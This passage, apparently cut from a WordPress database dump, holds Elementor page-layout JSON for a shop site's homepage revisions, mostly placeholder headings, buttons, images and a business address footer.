here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8232,1451,'_elementor_page_assets','a:0:{}'),(8235,1452,'_elementor_edit_mode','builder'),(8236,1452,'_elementor_template_type','wp-page'),(8237,1452,'_elementor_version','3.7.7'),(8238,1452,'_wp_page_template','elementor_canvas'),(8239,1452,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"224\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"-14\",\"right\":0,\"bottom\":\"-14\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e9c7fcf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"-25\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e8bbbae\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8240,1452,'_elementor_page_assets','a:0:{}'),(8242,1453,'_elementor_edit_mode','builder'),(8243,1453,'_elementor_template_type','wp-page'),(8244,1453,'_elementor_version','3.7.7'),(8245,1453,'_wp_page_template','elementor_canvas'),(8246,1453,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"224\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"-14\",\"right\":0,\"bottom\":\"-14\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\